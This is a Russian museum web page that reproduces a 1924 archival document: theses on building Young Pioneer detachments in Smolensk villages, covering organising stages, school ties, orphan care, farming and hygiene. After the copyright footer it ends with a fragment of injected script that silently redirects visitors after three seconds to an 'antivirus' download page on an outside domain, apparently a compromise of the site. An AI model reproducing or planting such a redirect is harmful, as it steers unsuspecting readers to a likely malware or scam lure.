Дети и молодежь Смоленщины. 1920-1930-е годы.
 
 

Выдержки из книги "Дети и молодежь Смоленщины: 1920-1930-е годы"

Тезисы доклада «О работе в деревне» к I Смоленскому
губернскому совещанию пионерских работников

1924 год*

I.
VI съезд определил задачи пионеров в деревне, это: подготовить смену для КСМ, воспитывать которую нужно в духе ленинизма.
«Ввести новую революционную струю в общественный и семейный быт деревни, приобщая детей к участию в социалистическом строительстве и всесторонне развивая детскую науку». «На пионеротряды в деревне ложится задача приблизить школу к общественной и трудовой жизни крестьян, внести в школу «коммунистический дух».
Пионеры в деревне должны стать рассадниками грамотности, физического оздоровления и гигиены. Залог выполнения этой задачи лежит в постоянной увязке с крестьянской жизнью, с сельским хозяйством, не обособляясь, а внедряясь в жизнь деревни и отвечая потребностям сегодняшнего дня.
II.
В нашей губернии наблюдается усиленная тяга деревенских детей в пионеротряды, организуются стихийно при ячейках комсомола в деревне группы ребятишек, которых ячейки привлекают к участию в некоторых частях своей работы.
Формы работы существующих отрядов в большинстве являются копией работы городских отрядов, но все же, в связи с расширением отрядов, существует выявление новых форм работы деревенских отрядов, вернее форм и методов, более приспособленных к условиям крестьянской жизни. Руководящий состав деревенских ячеек является, в большинстве, не понимающим основные задачи и формы детдвижения вообще и совершенно не подготовленным к этой работе, не желающим работать. Ячейки РЛКСМ стараются создать при себе отряды пионеров, а в существующих обращают внимание на участие в руководстве работой пионеротряда.
В связи с началом школьных занятий в деревне наблюдается стремление к организации отрядов пионеров беспартийными сель­скими учителями при школах, без согласия ячейки и при полном от­сутствии таковой. Отношение крестьянства (большинство бедняки) является доброжелательным по отношению существования отрядов, частично приводят своих ребятишек. Спрашивают о том, чему будут учить сына, в то же время недоброжелательно относятся к таким формам работы, как субботники и работа на бедняков, заявляя, что «незачем работать на людей».
III. Задачи
Отсутствие опыта работы и материальной возможности ставит вопрос о развертывании детского движения в деревне планово, систематически, создавая в первую очередь отряды в пунктах с наиболее развитыми организациями (совхозы, школы, кооперативы, нардома, при ячейках РЛКСМ и только под их непосредственным руководством). Таким первым пунктом расширения явится волостной центр укрупненной волости.
Следует решительно взять курс на создание отрядов пионеров только там, где есть ячейки РЛКСМ, но не при каждой ячейке, реши­тельно борясь с созданием отрядов учителями и агрономами. Как исключение, возможно создание «красными учителями» — комсомольцами отрядов при школе при отсутствии ячейки, при её дальнем месторасположении.
Существующие деревенские отряды, необходимо оформить, выявить формы работы, давая отрядам конкретный план, строго приспособленный к деревне и учитывающий условия данного отряда.
Вовлекать в детскую организацию в деревне следует, в первую очередь детей бедняков, батраков и середняков, группирующихся при ячейке РЛКСМ.
Ячейка РЛКСМ двигает из своей среды на эту работу наиболее развитого, грамотного парня, который и ведет работу с этой группой детей, выявляет опыт работы и, проходя курсы съезда, в ноябре еще шире развертывает работу отряда.
В целях успешного развертывания движения в деревне следует проделать подготовительную работу, которая будет идти по линии:
а)         обследования существующих отрядов, утвержденных, и групп организованных детей по определенной анкете (обследование даст материал к работе на курсах по составлению программ);
б)        ознакомление ячеек РКИ РЛКСМ данного района с детдвижением и задачей организации отряда.
Примечание: в делах обследования деревенских отрядов практиковать посылку городских вожатых отрядов.
IV. Как приступить к работе
Периоды работы. В условиях деревенской жизни. Организация пионеротряда и его полное оформление проходит три периода, начиная по принципу от более легкого к трудному. Такими периодами будут:
1. Создание маленького ядра ребят без формы пионерского отряда.
2. Оформление расширения детского кружка и приближение его к пионерскому отряду.
3. Открытое создание пионеротряда в его полной форме, строго
прилаженной к деревенским условиям.
Время и сроки периодов различны — от трех недель до одного месяца, первый период и второй — от одного до двух и т. п., в зависимости от условий и развития ребят.
Подход к работе товарища, выделенного на работу, должен быть без крика и шума, без записи в отряды, одевания трусов, красных галстуков и т. п.
В работе по организации детского движения в деревне основное — это завоевать авторитет и доверие масс крестьянства, выявить реальную пользу от пребывания детей в отряде.
В начале работы руководитель, выделенный ячейкой, должен детально ознакомиться с вопросами, интересующими детей, связавшись с основной массой ребятишек. Выяснить их запросы, завоевать авторитет и доверие путем участия в их играх и занятиях.
Выделенный руководитель должен выяснить возможность привлечения культурных сил деревни в селах: учителя, агронома, фельдшера и демобилизованного красноармейца. Нужно провести беседы по отдельным вопросам общего характера, сельскохозяйственным, медицинским, а также беседы с красноармейцами с фронта о боях и т. п. Занятия по физкультуре с руководителем и непосредственно с ребятами, а также выяснить возможность приглашения деревенского «спеца» корзинщика или сапожника, который скажет ребятам, как плести корзины или чинить валенки.
Первый период
Формами работы на первое время с группами будут являться проведение бесед и игр, изучение революционных песен, устройство спортзанятий, коллективное приготовление школьных заданий, мас­совые игры на воздухе, катание (на санках и «козелках»).
Беседы следует проводить на такие темы, как чтение интересных книжек, рассказы знающего красноармейца, беседы учителя о борьбе человека с природой и беседа агронома.
По проведению нескольких сборов, согласованных с избачом или учителем взяться за помощь избе-читальне, поддерживать её в чистоте, нужно сделать подшивку газет, вырезки, выписки справок и т. п. Работы следует распределять между отдельными ребятами, а также благодарить [за] конкретную помощь школе в её отоплении, украшении и поддержании в чистоте.
Результат проведенных работ в школе, избе-читальне, нардоме - следует отвоевать небольшой уголок и начать его украшение различными изделиями ребят, портретами, красными флажками и т. п.
По укреплению и выявлению определенного ядра ребят, желающих работать, следует начать подготовку к революционному празднику или просто к вечеру в школе.
Итоги первого периода: вовлечение, заинтересованность ребят формами работы и закрепление ядра группы ребятишек. Начало об­щественной работы и подготовка к первому, массовому выступлению.
Второй период
Задачи второго периода есть вовлечение ребят в детскую группу, выявление её среди населения и начало организационного оформления, как пионеротряда.
К подготовке к празднику следует привлекать больше новых ребят, привлекая их к участию в устраиваемом вечере.
Программа подготовки вечера должна состоять на следующих элементах: разучивание пьески, новых гимнастических упражнений, игр, песен, специальных стихотворений. Наряду с подготовкой к вечеру следует совместно с ячейкой провести воскресный день, трудовую работу в помощь бедной семье, распилку дров для избы-читальни или школы и другую ра­боту, в то же время, следя за исполнением прежде порученных работ по избе-читальне, школе, нардому, распределяя работы между новыми ребятами, поручая записывать наблюдения над природой (время выпадения снега, велик ли его покров, появление зимних птиц). Этот материал по наблюдению над природой послужит причиной для объяснения, что сельское хозяйство за­висит не от бога, а от природы.
Примечание: к помощи в разработке этих вопросов следует при­влекать учителя для ознакомления руководителя или непосредственно ребят с этими вопросами.
Проведение подготавливаемого вечера явится завершением определенной части проделанной работы и вызовет подъем среди ребят, организованных в кружок, а также привлечет новых.
Подъем необходимо использовать для дальнейшей работы и по­вести подготовку к новому вечеру в революционный праздник (20-летие революции пятого года).
Провести беседы:
1. Что было 20 лет назад и почему (оттенить крестьянские волнения).
2. Как жили дети при помещиках и царе.
Начать украшать школу и избу-читальню совместно с учителем и избачом. Разучить новые песни. Научиться ходить в строю и приготовить новые гимнастические упражнения.
Трудовые занятия в этот период должны идти по линии приглашения деревенского «спеца» корзинщика или сапожника, для показа ребятам, как производится его работа.
Также следует пригласить агронома для проведения бесед по ухаживанию за курами, о разведении кроликов и т. п. Трудовые беседы следует практически закреплять разведением кроликов при избе-читальне, школе и применению способов, указанных агрономом, дома, с согласия родителей.
Трудовые занятия следует чередовать с беседами на живые темы и с играми.
На последующем сборе — проведение бесед: «Кто такие пионеры и какие у них задачи»; «Кто такой Ленин и почему пионеры носят его имя». После беседы произвести разбивку на звенья по территориальному признаку, возрасту и дружбе. Выбор названий: Красный пахарь, Серп, Коса, Трактор, Рожь и т. п. Также произвести выборы вожатых звеньев.
В ближайший день или часы собираются все вожатые звеньев с вожатыми отряда и представителем бюро ячейки РЛКСМ, что составляет совет отряда. Разрабатывают совместно план работы и распределяют конкретные задания по звеньям. Решения совета отряда записыва­ются в особую тетрадь.
В последующее время сборы звеньев должны происходить один-два раза в неделю, в зависимости от ребят. Сборы отряда производить один раз в неделю по воскресеньям. На сборе звенья показывают сообща достижения (поют песни, играют в разученные игры, здесь же проводится общая беседа, трудовые работы в школе, избе-читальне или у крестьян, обсуждаются практические вопросы и распределяются дальнейшие задания по звеньям).
На последующих сборах взяться за издание стенгазеты, выбрав редколлегию, завязать связь с отрядом другого города, проводить беседы о пионерах СССР и комсомольцах, разбор законов, обычаев (применимых в деревне) и торжественного обещания.
Проведение подготовленного вечера к 20-летию 1905 года и другого революционного праздника явится завершением второго периода. Итоги этого периода — это организационное оформление отряда, подведение его к пионерству, выделение пионеров в новое крестьянство и подготовка к утверждению.

Третий период. Это открытое создание пионеротряда, его расширение и утверждение, приуроченное к определенному революционному празднику, после прохождения трех-четырех-месячной подготовки, достаточного выявления полезности организации среди крестьянства и завоевания авторитета.
Срок утверждения можно увеличить или снизить, в зависимости от наличия условий, но ни в коем случае не снижая ниже двух месяцев. К утверждению необязательно иметь костюмы, важно косынка или значки.
Задачею утвержденного отряда является дальнейшее завоевание авторитета крестьянства и проявление отряда в деревне, как настоящего центра детской активности как в деревне, так и в школе. Следует составить дальнейший план работы отряда, сообразуясь и приспосабливаясь к условиям быта и жизни данной деревни, села.
V. Работа звена и отряда
В работе звена и отряда должна существовать строгая разграниченность и ясность. Звено углубляет и разрабатывает сказанное и проделанное в отряде, исполняет отдельные части работы общего плана, проявляя собственную инициативу в порученных заданиях и исполняя внеплановые общественно-трудовые работы по своему усмотрению у себя в деревне.
Если отряд объединяет звенья из разных деревень, то на звено каждой деревни ложится отдельная работа в своей деревне, а на от­ряде заслушивают отчеты звеньев.
Прохождение трудового обучения должно являться постоянной частью работы звена, как массовая форма работы зимой на улице: катание на санках, трудовые работы по очистке от снега, наваливание его к амбарам. Массовые игры, снежки, крепости, ледяные горки, коньки и т. п.
VI. Работа в школе и со школой
Работа пионерского отряда, находящегося вблизи школы, должна быть в постоянной тесной связи с таковой[школой], как в отношении помощи, так и в отношении участия в работе по школьному самоуправлению, культурно-просветительной работе и проведению отдельных работ отряда в школе.
Пионерские форпосты в деревенских школах не создаются там, где есть красуч, руководящий отрядом при данной школе. Во всех остальных случаях создаются форпосты, которые ведут тесную работу с учительством в деле проведения новых программ в школе. Фор­постом руководит также комсомолец - вожатый отряда. Необходимо также следить, чтобы работа отряда не отрывала от школы, а помогала ей.
VII. Работники
Работники пионерского движения выделяются ячейкой ком­сомола. Товарищи достаточно грамотные - не перегруженные работой (секретарством) и хорошие как комсомольцы, которые ведут работу и отчитываются перед ячейкой, которая, в свою очередь, получает директивы убюро. Ячейка комсомола отдельные вопросы и вопросы обеспечения отряда согласовывает с ячейкой РКП и волкомами РЛКСМ. Ячейка помогает отряду в его общест­венной работе, работе в школе и всячески следит за правильным ходом работы в отряде, руководя только через вожатого и совет отряда, не делая указаний вожатому во время его занятий с отрядом. Пионеры посещают собрания ячейки, наиболее интересные, но ни в коем случае не бывают постоянными посетителями ячейки, подчас мешающими проведению таковой и ничего не дающей им самим.
VIII. Борьба с беспризорностью
Отдельным моментом работы утвержденного деревенского отряда является борьба с беспризорностью. Необходимо взять на учет всех круглых сирот, добиться через партячейку и сельсовет опеки над ними (есть закон об опеке над ними), как выполняется эта опека, и вовлекать тех детей в пионеротряды. Следить за тем, чтобы малолетний пастух, взятый обществом на прокормление, достаточным образом кормился. Следует обратить внимание на привлечение малолетних пастухов в пионерские отряды, борясь со взглядом детей деревни на пастуха как на ниже их стоящего.
IX. Изучение сельскохозяйственных вопросов
Изучение сельскохозяйственных вопросов в пионеротряде должно занимать одно из первых мест. Беседы, проводимые агрономом по сельскохозяйственным вопросам, должны давать конкретные и ясные понятия, применяемые как в отдельном хозяйстве, так и в создании своего коллективного небольшого хозяйства (разведение кур, кроликов при школах, избе-читальне).
Пионеры участвуют в сельскохозяйственных кружках комсомо­ла, как младшая его секция. Следует бороться со стремлением работать только на коллективном хозяйстве, не применяя полученных не­больших знаний у себя дома, ибо это подорвет авторитет пионерско­го отряда среди крестьянства. В то же время работа дома и работа на коллективном хозяйстве покажет крестьянину реальную пользу, по­лучаемую его детьми в пионерском отряде.
X. Физкультура
Физкультура в деревенском отряде является одним из привлекательнейших видов пионерских занятий. Следует взять курс в большинстве на гигиену личную и общественную, следя за чистотой рук, лица и приучая ребят убирать свою хату-дом, следить в ней за чис­тотой, в то же время поддерживая чистоту в школе, избе-читальне. Необходимо проводить беседы о гигиене, приглашая фельдшера и деревенского врача. Зимой спорт в большинстве должен быть массовым на улице. Пионеры в школе должны вести уроки гимнастики, если есть подходящий руководитель.
XI. Отдельные моменты работы
Политико-воспитательная работа: беседы, чтения, работы над газетой — должны быть понятны ребятам и связаны с примером сегодняшнего дня. При развертывании работы следует произвести учет неграмотных детей, создать кружок в деревне, в котором произво­дить обучение неграмотных детей грамотными пионерами. И следить за посещением детьми школы, выясняя каждый раз о причинах неявки, и по возможности, оказывая помощь через сельсовет.
Общественно-трудовые работы первое время работы отряда не должны быть слишком часты и носить более общественный характер (работы для избы-читальни, нардома, школы и т. п.).
Проведение экскурсии в совхоз, агропункт и, по возможности, в город явится громаднейшим толчком в работе деревенского отряда.
XII. Подготовка работников
Успех развертывания и правильной постановки детского движения в деревне в огромной степени зависит от руководителей детдвижения. Совершенно необходимым является проведение уездных курсов-семидневок работников детского движения деревни, которые бы дали основные познания деревенским работникам в вопросах дет движения. Кампанию курсов съездов необходимо провести в губер­нии единовременно в ноябре месяце по программе центрального бюро, измененной и пополненной, исходя из местных условий губернии.
На уездные курсы следует вызвать всех вожатых существующих деревенских отрядов и товарищей ячеек, при которых предполага­ется организация отряда.
Как форму подготовки работников на местах, в волостях с разви­тым детдвижением рекомендовать волсовещания детработников с приездом к ним товарищей из убюро.
XIII. Учет опыта работы и инструктирования
Постановка учета опыта работы имеет огромнейшее значение в деле развертывания и выявления форм работы деревенских отрядов.
На местах рекомендуется [вести] дневники отрядов отдельных территориально далеких звеньев и дневники вожатых отрядов.
Как форма учета и инструктирования учета мест периодически один-два раза в месяц проводятся совещания вожатых отрядов в уезде, обследование отдельных отрядов, вызовы отдельных вожатых. Директивы убюро должны быть не вообще, а приспособлены к каж­дому отряду.
XIV. Связь с городом
Для более успешной работы необходимо привлечь внимание профсоюза Всеработземлеса, шефбюро УОНО в деле выделения передвижек-библиотек для деревенских отрядов и оказания возможной ма­териальной помощи таковым.
Для укрепления связи города с деревней необходимо прикрепле­ние к каждому деревенскому отряду городского отряда или звена для связи.
XV. Выводы
Предпосылка роста и развертывания детдвижения в губернии и в деревне огромная. Следует обратить внимание на правильное его регулирование, исходя из наличия имеющихся сил и средств, не стараясь, ни в коем случае, развертывать отряды при каждой деревенской ячейке.
Выявление форм работы, приспособление работы к деревенским условиям и накопление опыта является самым основным и большим залогом успеха всей работы в деревне.

ГАНИСО, ф. р-140, оп. 2, д. 16, л. 23-28. Копия.

* Датируется по смежным документам.

 

 


Литература
Так это было

"Так это было.
Смоленский
комсомол 1960-80
годов в воспоминаниях
современников"
Дети и молодёжь Смоленщины 1920-1930-е годы
Дети и молодёжь
Смоленщины
1920-1930-е годы

Спонсоры музея истории молодежного движения

 

Выражаем огромную благодарность людям, которые приняли и принимают участие в жизни музея и комплектации его фондов.


       
      
    (c) Авторские права на сайт принадлежат ООО "Союз ДМ", Смоленской областной общественной организации Общероссийской общественной организации "Российский Союз Молодежи", 2008-2012г.  
setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>